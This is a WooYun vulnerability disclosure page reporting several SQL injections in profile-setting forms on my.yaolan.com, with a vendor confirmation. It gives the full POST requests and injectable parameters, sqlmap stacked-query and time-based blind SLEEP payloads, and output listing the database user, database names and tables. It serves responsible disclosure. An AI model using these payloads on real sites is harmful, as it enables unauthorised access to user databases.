当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0119035

漏洞标题:摇篮网某站多处SQL注射

相关厂商:摇篮网

漏洞作者: 路人甲

提交时间:2015-06-09 11:36

修复时间:2015-07-24 12:48

公开时间:2015-07-24 12:48

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-09: 细节已通知厂商并且等待厂商处理中
2015-06-09: 厂商已经确认,细节仅向厂商公开
2015-06-19: 细节向核心白帽子及相关领域专家公开
2015-06-29: 细节向普通白帽子公开
2015-07-09: 细节向实习白帽子公开
2015-07-24: 细节向公众公开

简要描述:

肉肉走了,呜呜~~~~(>_<)~~~~

详细说明:

POST /UserSetting/UserExtInfo.aspx HTTP/1.1
Content-Length: 3421
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: my.yaolan.com
Cookie: 
Host: my.yaolan.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.0 Safari/537.36
Accept: */*
ctl00%24cphContent%24btnSave=&ctl00%24cphContent%24ddlEducation=-1&ctl00%24cphContent%24ddlIncome=-1&ctl00%24cphContent%24ddlProfession=-1&ctl00%24cphContent%24ddlTrade=-1&ctl00%24cphContent%24rbtnSecret=0&ctl00%24cphContent%24txtAddress=3137%20Laguna%20Street&ctl00%24cphContent%24txtMobile=987-65-4329&ctl00%24cphContent%24txtMSN=12&ctl00%24cphContent%24txtName=dwtrwehw&ctl00%24cphContent%24txtPhone=555-666-0606&ctl00%24cphContent%24txtPostCode=94102&ctl00%24cphContent%24txtQQ=1&ctl00%24cphContent%24txtSchool=1&ctl00%24cphContent%24txtWangWang=1&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWPgK5jaj7BQLpm53bCQKG6oP8CgKK6u//CgKK6uP/CgKL6o/8CgKL6oP8CgKL6of8CgKL6rv8CgKL6r/8CgKL6rP8CgKL6rf8CgKL6qv8CgKL6u//CgKL6uP/CgKE8aD2BQKI8ez1BQKJ8ez1BQKK8ez1BQKL8ez1BQKM8ez1BQKN8ez1BQKO8ez1BQKf8ez1BQKQ8ez1BQKI8az2BQKI8aD2BQKI8aT2BQKI8Zj2BQKI8Zz2BQKI8ZD2BQKI8ZT2BQKI8Yj2BQKcjrvqAgKSjrfqAgKSjrvqAgKSjr/qAgKSjoPqAgKSjofqAgKVveCsCAL1mv%2bkDAL4mrOnDAL7mrOnDAL6mrOnDAL9mrOnDAL8mrOnDAL/mrOnDALumrOnDALhmrOnDAKSpKy2CQKh3vzRDQKt%2bLhTApzNwf4GAvmd2ZYIArOZldMFAvre2cQLApiPpiQCh4%2bmJAKGj6YkAojgjMoMAvOdoTQCz92MkQJYM285C7uL9dvE8qRttthqdUXxPQ%3d%3d&__VIEWSTATE=/wEPDwUKMjE0MDk0OTQ3MA9kFgJmD2QWAgIDD2QWAgIBD2QWAgIFD2QWDmYPZBYCAgEPFgIeBFRleHQFjQE8YSBocmVmPScvVXNlclNldHRpbmcvVXNlclNldHRpbmdDZW50ZXIuYXNweCcgPuiuvue9ruS4reW/gzwvYT48c3Bhbj4mZ3Q7Jmd0Ozwvc3Bhbj48YSBocmVmPScvVXNlclNldHRpbmcvVXNlckJhc2VJbmZvLmFzcHgnPuS4quS6uui1hOaWmTwvYT5kAgIPDxYCHgdWaXNpYmxlaGRkAgQPEA8WBh4NRGF0YVRleHRGaWVsZAUOUHJvZmVzc2lvbk5hbWUeDkRhdGFWYWx1ZUZpZWxkBQxQcm9mZXNzaW9uSWQeC18hRGF0YUJvdW5kZ2QQFQ0M6YCJ5oup6IGM5LiaHeaAu%2be7j%2beQhi/okaPkuovplb8v6LSf6LSj5Lq6EuengeiQpeS8geS4muS4muS4uxzpg6jpl6jnu4/nkIYv5Lit6auY57qn5Li7566hGeS4muWKoeS6uuWRmC/kuIDoiKzogYzlkZgU5Yab5Lq6L%2bitpuWvny/mraboraYN5pWZ5o6IL%2baVmeW4iA/oh6rnlLHogYzkuJrogIUG5a2m55SfBuW%2bheS4mg3pgIDkvJEv56a75LyRDOWutuW6reS4u%2bWmhwblhbblroMVDQItMQIxOAIxOQIyMAIyMQIyMgIyMwIyNAIyNQIyNgIyNwIyOAIyORQrAw1nZ2dnZ2dnZ2dnZ2dnZGQCBQ8QDxYGHwIFCVRyYWRlTmFtZR8DBQdUcmFkZUlkHwRnZBAVEgzpgInmi6nooYzkuJoX6K6h566X5py6L%2bmAmuS/oS/nlLXlrZAW5LqS6IGU572RL%2beUteWtkOWVhuWKoRvkvJrorqEv6YeR6J6NL%2bmTtuihjC/kv53pmake6LS45piTL%2bi/m%2bWHuuWPoy/mibnlj5Ev6Zu25ZSuF%2bWItumAoC/liqDlt6Uv5raI6LS55ZOBG%2bW5v%2bWRii/lqpLkvZMv5YWs5YWzL%2bS8oOaSrR7miL/lnLDkuqcv5bu6562RL%2bWutuWxhS/niankuJob5pWZ6IKyL%2bWfueiurS/np5HnoJQv6Zmi5qChG%2bWItuiNry/ljLvnlpcv5L%2bd5YGlL%2beUn%2beJqSHkuJPkuJrmnI3liqEv5rOV5b6LL%2biupOivgS/lkqjor6Ib5paH5L2TL%2biJuuacry/kvJHpl7Iv5aix5LmQG%2beJqea1gS/ov5DovpMv5LuT5YKoL%2bS6pOmAmhDog73mupAv5Y6f5p2Q5paZHOaUv%2bW6nOacuuWFsy/pnZ7nm4jliKnmnLrmnoQa55Sf5rS75pyN5YqhL%2bmkkOmlri/ml4XmuLgS5YacL%2baely/niacv5riU5LiaBuWFtuWugxUSAi0xATEBMgEzATQBNQE2ATcBOAE5AjEwAjExAjEyAjEzAjE0AjE1AjE2AjE3FCsDEmdnZ2dnZ2dnZ2dnZ2dnZ2dnZ2RkAgYPEA8WBh8CBQ1FZHVjYXRpb25OYW1lHwMFC0VkdWNhdGlvbklkHwRnZBAVBgzpgInmi6nlrabljoYG5bCP5a2mBuWIneS4rQ3pq5jkuK0v5Lit5LiTDeWkp%2bWtpi/lpKfkuJMP56GV5aOr5Y%2bK5Lul5LiKFQYCLTECMzACMzECMzICMzMCMzQUKwMGZ2dnZ2dnZGQCCA8QDxYGHwIFCkluY29tZU5hbWUfAwUISW5jb21lSWQfBGdkEBUJDOmAieaLqeaUtuWFpRAxMDAwLTIwMDDlhYMv5pyIEDIwMDEtNDAwMOWFgy/mnIgQNDAwMS02MDAw5YWDL%2baciBA2MDAxLTgwMDDlhYMv5pyIETgwMDEtMTAwMDDlhYMv5pyIEjEwMDAxLTE1MDAw5YWDL%2baciBIxNTAwMC0yNTAwMOWFgy/mnIgSMjUwMDDlhYMv5pyI5Lul5LiKFQkCLTEBMgEzATQBNQE2ATcBOAE5FCsDCWdnZ2dnZ2dnZ2RkAg8PDxYCHwBlZGRk4JfrQtbAzW0%2bvqlGtPBYTAzBeYA%3d
4个参数:
ctl00$cphContent$txtMSN
ctl00$cphContent$txtPhone
ctl00$cphContent$txtQQ
ctl00$cphContent$txtPostCode
POST /UserSetting/UserBbsSigned.aspx HTTP/1.1
Content-Length: 1757
Content-Type: multipart/form-data; boundary=-----Boundary_MOMKKHNWVO
X-Requested-With: XMLHttpRequest
Referer: my.yaolan.com
Cookie: 
Host: my.yaolan.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.0 Safari/537.36
Accept: */*
Content-Type: multipart/form-data; boundary=-----Boundary_OPROVBYWFX
-------Boundary_OPROVBYWFX
Content-Disposition: form-data; name="ctl00$cphContent$btnFileLoad"
-------Boundary_OPROVBYWFX
Content-Disposition: form-data; name="aHead"
a
-------Boundary_OPROVBYWFX
Content-Disposition: form-data; name="aword"
1
-------Boundary_OPROVBYWFX
Content-Disposition: form-data; name="ctl00$cphContent$bbsFCKeditor"
&lt;center&gt;&lt;font color='#6666CC'&gt;&lt;a href='http://space.yaolan.com/55415529'&gt;&lt;img src='http://g.yaolanimage.cn/www/images/avatar100.gif'  border='0'&gt;&lt;/a&gt;&lt;br /&gt;##############################&lt;/font&gt;&lt;/center&gt;
-------Boundary_OPROVBYWFX
Content-Disposition: form-data; name="sign_tab"
1
-------Boundary_OPROVBYWFX
Content-Disposition: form-data; name="stemplate_item"
1
-------Boundary_OPROVBYWFX
Content-Disposition: form-data; name="__EVENTVALIDATION"
/wEWBALex6zdCAKw3ZuLCgLssvH9BgLP3dD/B6IUzYNwqIOD5W1oogxo8DGmK+pp
-------Boundary_OPROVBYWFX
Content-Disposition: form-data; name="__VIEWSTATE"
/wEPDwUKLTI4MzM2NTAwOQ9kFgJmD2QWAgIDD2QWAgIBDxYCHgdlbmN0eXBlBRNtdWx0aXBhcnQvZm9ybS1kYXRhFgICBQ9kFgRmD2QWAgIBDxYCHgRUZXh0BYoBPGEgaHJlZj0nL1VzZXJTZXR0aW5nL1VzZXJTZXR0aW5nQ2VudGVyLmFzcHgnID7orr7nva7kuK3lv4M8L2E+PHNwYW4+Jmd0OyZndDs8L3NwYW4+PGEgaHJlZj0nL1VzZXJTZXR0aW5nL1VzZXJCb2FyZC5hc3B4Jz7lhbblroPorr7nva48L2E+ZAICDw8WAh4HVmlzaWJsZWhkZGS5FVeOHR2hlUDLSMdWkea0MInbFw==
-------Boundary_OPROVBYWFX
Content-Disposition: form-data; name="ctl00$cphContent$FileUpload1"; filename="abc.txt"
Content-Type: text/plain
-------Boundary_OPROVBYWFX--
参数:
aHead
ctl00$cphContent$bbsFCKeditor
stemplate_item

漏洞证明:

---
Parameter: ctl00$cphContent$txtMSN (POST)
    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
    Payload: ctl00$cphContent$btnSave=&ctl00$cphContent$ddlEducation=-1&ctl00$cphContent$ddlIncome=-1&ctl00$cphContent$ddlProfession=-1&ctl00$cphContent$ddlTrade=-1&ctl00$cphContent$rbtnSecret=0&ctl00$cphContent$txtAddress=3137 Laguna Street&ctl00$cphContent$txtMobile=987-65-4329&ctl00$cphContent$txtMSN=12';(SELECT * FROM (SELECT(SLEEP(5)))MWSc)#&ctl00$cphContent$txtName=dwtrwehw&ctl00$cphContent$txtPhone=555-666-0606&ctl00$cphContent$txtPostCode=94102&ctl00$cphContent$txtQQ=1&ctl00$cphContent$txtSchool=1&ctl00$cphContent$txtWangWang=1&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWPgKexIHzBgLpm53bCQKG6oP8CgKK6u//CgKK6uP/CgKL6o/8CgKL6oP8CgKL6of8CgKL6rv8CgKL6r/8CgKL6rP8CgKL6rf8CgKL6qv8CgKL6u//CgKL6uP/CgKE8aD2BQKI8ez1BQKJ8ez1BQKK8ez1BQKL8ez1BQKM8ez1BQKN8ez1BQKO8ez1BQKf8ez1BQKQ8ez1BQKI8az2BQKI8aD2BQKI8aT2BQKI8Zj2BQKI8Zz2BQKI8ZD2BQKI8ZT2BQKI8Yj2BQKcjrvqAgKSjrfqAgKSjrvqAgKSjr/qAgKSjoPqAgKSjofqAgKVveCsCAL1mv+kDAL4mrOnDAL7mrOnDAL6mrOnDAL9mrOnDAL8mrOnDAL/mrOnDALumrOnDALhmrOnDAKSpKy2CQKh3vzRDQKt+LhTApzNwf4GAvmd2ZYIArOZldMFAvre2cQLApiPpiQCh4+mJAKGj6YkAojgjMoMAvOdoTQCz92MkQIP4+gVvb9oa9abdIatr9WIl7IakQ==&__VIEWSTATE=/wEPDwUKMjE0MDk0OTQ3MA9kFgJmD2QWAgIDD2QWAgIBD2QWAgIFD2QWDmYPZBYCAgEPFgIeBFRleHQFjQE8YSBocmVmPScvVXNlclNldHRpbmcvVXNlclNldHRpbmdDZW50ZXIuYXNweCcgPuiuvue9ruS4reW/gzwvYT48c3Bhbj4mZ3Q7Jmd0Ozwvc3Bhbj48YSBocmVmPScvVXNlclNldHRpbmcvVXNlckJhc2VJbmZvLmFzcHgnPuS4quS6uui1hOaWmTwvYT5kAgIPDxYIHghDc3NDbGFzcwUHc3VjY2Vzcx4HVmlzaWJsZWcfAAV95Liq5Lq66auY57qn5L+h5oGv5pu05paw5oiQ5Yqf77yBPGEgaHJlZj0naHR0cDovL3NwYWNlLnlhb2xhbi5jb20vNTU0MTU1MjkvdXNlcnByb2ZpbGUuaHRtbCcgdGFyZ2V0PSdfYmxhbmsnPueCueWHu+afpeecizwvYT4eBF8hU0ICAmRkAgQPEA8WBh4NRGF0YVRleHRGaWVsZAUOUHJvZmVzc2lvbk5hbWUeDkRhdGFWYWx1ZUZpZWxkBQxQcm9mZXNzaW9uSWQeC18hRGF0YUJvdW5kZ2QQFQ0M6YCJ5oup6IGM5LiaHeaAu+e7j+eQhi/okaPkuovplb8v6LSf6LSj5Lq6EuengeiQpeS8geS4muS4muS4uxzpg6jpl6jnu4/nkIYv5Lit6auY57qn5Li7566hGeS4muWKoeS6uuWRmC/kuIDoiKzogYzlkZgU5Yab5Lq6L+itpuWvny/mraboraYN5pWZ5o6IL+aVmeW4iA/oh6rnlLHogYzkuJrogIUG5a2m55SfBuW+heS4mg3pgIDkvJEv56a75LyRDOWutuW6reS4u+WmhwblhbblroMVDQItMQIxOAIxOQIyMAIyMQIyMgIyMwIyNAIyNQIyNgIyNwIyOAIyORQrAw1nZ2dnZ2dnZ2dnZ2dnZGQCBQ8QDxYGHwQFCVRyYWRlTmFtZR8FBQdUcmFkZUlkHwZnZBAVEgzpgInmi6nooYzkuJoX6K6h566X5py6L+mAmuS/oS/nlLXlrZAW5LqS6IGU572RL+eUteWtkOWVhuWKoRvkvJrorqEv6YeR6J6NL+mTtuihjC/kv53pmake6LS45piTL+i/m+WHuuWPoy/mibnlj5Ev6Zu25ZSuF+WItumAoC/liqDlt6Uv5raI6LS55ZOBG+W5v+WRii/lqpLkvZMv5YWs5YWzL+S8oOaSrR7miL/lnLDkuqcv5bu6562RL+WutuWxhS/niankuJob5pWZ6IKyL+WfueiurS/np5HnoJQv6Zmi5qChG+WItuiNry/ljLvnlpcv5L+d5YGlL+eUn+eJqSHkuJPkuJrmnI3liqEv5rOV5b6LL+iupOivgS/lkqjor6Ib5paH5L2TL+iJuuacry/kvJHpl7Iv5aix5LmQG+eJqea1gS/ov5DovpMv5LuT5YKoL+S6pOmAmhDog73mupAv5Y6f5p2Q5paZHOaUv+W6nOacuuWFsy/pnZ7nm4jliKnmnLrmnoQa55Sf5rS75pyN5YqhL+mkkOmlri/ml4XmuLgS5YacL+aely/niacv5riU5LiaBuWFtuWugxUSAi0xATEBMgEzATQBNQE2ATcBOAE5AjEwAjExAjEyAjEzAjE0AjE1AjE2AjE3FCsDEmdnZ2dnZ2dnZ2dnZ2dnZ2dnZ2RkAgYPEA8WBh8EBQ1FZHVjYXRpb25OYW1lHwUFC0VkdWNhdGlvbklkHwZnZBAVBgzpgInmi6nlrabljoYG5bCP5a2mBuWIneS4rQ3pq5jkuK0v5Lit5LiTDeWkp+Wtpi/lpKfkuJMP56GV5aOr5Y+K5Lul5LiKFQYCLTECMzACMzECMzICMzMCMzQUKwMGZ2dnZ2dnZGQCCA8QDxYGHwQFCkluY29tZU5hbWUfBQUISW5jb21lSWQfBmdkEBUJDOmAieaLqeaUtuWFpRAxMDAwLTIwMDDlhYMv5pyIEDIwMDEtNDAwMOWFgy/mnIgQNDAwMS02MDAw5YWDL+aciBA2MDAxLTgwMDDlhYMv5pyIETgwMDEtMTAwMDDlhYMv5pyIEjEwMDAxLTE1MDAw5YWDL+aciBIxNTAwMC0yNTAwMOWFgy/mnIgSMjUwMDDlhYMv5pyI5Lul5LiKFQkCLTEBMgEzATQBNQE2ATcBOAE5FCsDCWdnZ2dnZ2dnZ2RkAg8PDxYCHwAFCzk4Ny02NS00MzI5ZGRkkGLk8jFp+yV1AKc60uKrM2wOpCY=
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: ctl00$cphContent$btnSave=&ctl00$cphContent$ddlEducation=-1&ctl00$cphContent$ddlIncome=-1&ctl00$cphContent$ddlProfession=-1&ctl00$cphContent$ddlTrade=-1&ctl00$cphContent$rbtnSecret=0&ctl00$cphContent$txtAddress=3137 Laguna Street&ctl00$cphContent$txtMobile=987-65-4329&ctl00$cphContent$txtMSN=12' AND (SELECT * FROM (SELECT(SLEEP(5)))OxGg) AND 'kQoq'='kQoq&ctl00$cphContent$txtName=dwtrwehw&ctl00$cphContent$txtPhone=555-666-0606&ctl00$cphContent$txtPostCode=94102&ctl00$cphContent$txtQQ=1&ctl00$cphContent$txtSchool=1&ctl00$cphContent$txtWangWang=1&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWPgKexIHzBgLpm53bCQKG6oP8CgKK6u//CgKK6uP/CgKL6o/8CgKL6oP8CgKL6of8CgKL6rv8CgKL6r/8CgKL6rP8CgKL6rf8CgKL6qv8CgKL6u//CgKL6uP/CgKE8aD2BQKI8ez1BQKJ8ez1BQKK8ez1BQKL8ez1BQKM8ez1BQKN8ez1BQKO8ez1BQKf8ez1BQKQ8ez1BQKI8az2BQKI8aD2BQKI8aT2BQKI8Zj2BQKI8Zz2BQKI8ZD2BQKI8ZT2BQKI8Yj2BQKcjrvqAgKSjrfqAgKSjrvqAgKSjr/qAgKSjoPqAgKSjofqAgKVveCsCAL1mv+kDAL4mrOnDAL7mrOnDAL6mrOnDAL9mrOnDAL8mrOnDAL/mrOnDALumrOnDALhmrOnDAKSpKy2CQKh3vzRDQKt+LhTApzNwf4GAvmd2ZYIArOZldMFAvre2cQLApiPpiQCh4+mJAKGj6YkAojgjMoMAvOdoTQCz92MkQIP4+gVvb9oa9abdIatr9WIl7IakQ==&__VIEWSTATE=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
---
web server operating system: Windows
web application technology: ASP.NET, ASP.NET 2.0.50727
back-end DBMS: MySQL 5.0.11
current user:    'userweb@%'
current user is DBA:    False
available databases [2]:
[*] information_schema
[*] user_yaolan_com
[INFO] fetching tables for database: 'user_yaolan_com'
[INFO] fetching number of tables for database 'user_yaolan_com'
[INFO] resumed: 31
[INFO] resumed: BoroughList
[INFO] resumed: ChildInfo
[INFO] resumed: ChildInterestDetailList
[INFO] resumed: ChildInterestInfo
[INFO] resumed: ChildInterestList
[INFO] resumed: CityList
[INFO] resumed: CoinInfo
[INFO] resumed: CountryList
[INFO] resumed: E~ucationLjst
[INFO] resumed: GeekList
[INFO] resumed: GradeList
.................

修复方案:

~~~

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-06-09 12:04

厂商回复:

漏洞已确认,正在处理。非常感谢乌云及白帽子提供的信息。稍后会有人联系赠送礼物,谢谢。

最新状态:

暂无

漏洞评价:

评论